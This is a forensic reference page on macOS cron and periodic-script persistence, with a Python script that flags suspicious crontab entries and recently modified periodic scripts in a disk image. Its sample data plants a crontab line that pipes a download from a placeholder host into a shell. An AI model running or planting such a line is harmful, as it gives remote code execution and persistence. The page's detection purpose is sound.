Cron Jobs & Periodic Scripts

macOS, Persistence Mechanisms, Disk Image

Location

/usr/lib/cron/tabs/ (user crontabs), /etc/crontab, /etc/periodic/ (daily/weekly/monthly)

Description

macOS supports both traditional cron job scheduling via crontab and the periodic system that runs maintenance scripts at daily, weekly, and monthly intervals via launchd. User crontabs are stored in /usr/lib/cron/tabs/ and system-wide tasks in /etc/crontab. The periodic directories contain shell scripts executed by the com.apple.periodic-* LaunchDaemons.

Forensic Value

While LaunchAgents and LaunchDaemons are the dominant macOS scheduling mechanisms, cron jobs remain functional and are used by attackers who are more familiar with Linux persistence techniques. User crontabs in /usr/lib/cron/tabs/ may contain entries that download and execute payloads from external URLs. Scripts added to /etc/periodic/daily/ execute as root once per day and can fly under the radar because administrators expect files in these directories. File modification timestamps and content analysis of periodic scripts identify unauthorized additions.
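
The checks described above, as an added example (not part of the original page or of any tool it lists): it scans a mounted image root for active crontab lines that reference a fetch tool or URL, and for periodic scripts modified after a baseline time. The regex heuristic, the baseline timestamp, and the sample tree built by `build_sample` are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Locations named on this page, relative to the mounted image root.
CRON_PATHS = ["usr/lib/cron/tabs", "etc/crontab"]
PERIODIC_DIRS = [f"etc/periodic/{p}" for p in ("daily", "weekly", "monthly")]
# Heuristic (assumption): a fetch tool or a URL inside a scheduled command.
FETCH = re.compile(r"\b(curl|wget)\b|https?://", re.I)

def _files(path):
    if path.is_dir():  # directory of crontabs or periodic scripts
        return sorted(f for f in path.iterdir() if f.is_file())
    return [path] if path.is_file() else []

def suspicious_cron(root):
    """Return (file, line_no, text) for active cron lines matching FETCH."""
    hits = []
    for rel in CRON_PATHS:
        for f in _files(Path(root, rel)):
            lines = f.read_text(errors="replace").splitlines()
            for n, line in enumerate(lines, 1):
                s = line.strip()
                if s and not s.startswith("#") and FETCH.search(s):
                    hits.append((f.relative_to(root).as_posix(), n, s))
    return hits

def recent_periodic(root, baseline_epoch):
    """Return periodic scripts modified after baseline_epoch (e.g. OS install)."""
    return [f.relative_to(root).as_posix() for rel in PERIODIC_DIRS
            for f in _files(Path(root, rel)) if f.stat().st_mtime > baseline_epoch]

def build_sample(root):
    """Write a constructed image tree; every name and value is made up."""
    tabs, daily = Path(root, "usr/lib/cron/tabs"), Path(root, "etc/periodic/daily")
    for d in (tabs, daily):
        d.mkdir(parents=True)
    (tabs / "alice").write_text("# backup\n0 2 * * * /usr/bin/true\n"
                                "*/30 * * * * curl -s http://example.invalid/a | sh\n")
    Path(root, "etc/crontab").write_text("# curl http://example.invalid/old\n")
    for name, mtime in (("100.stock", 1_600_000_000), ("999.added", 1_700_000_000)):
        (daily / name).write_text("#!/bin/sh\n")
        os.utime(daily / name, (mtime, mtime))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        print(suspicious_cron(root), recent_periodic(root, 1_650_000_000))
```

A match is a lead for manual review, not a verdict: copying or restoring a file can change its modification time, so compare flagged periodic scripts against a known-good install of the same OS version.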

Tools Required

crontab -l, cat, find, mac_apt, KnockKnock (Objective-See)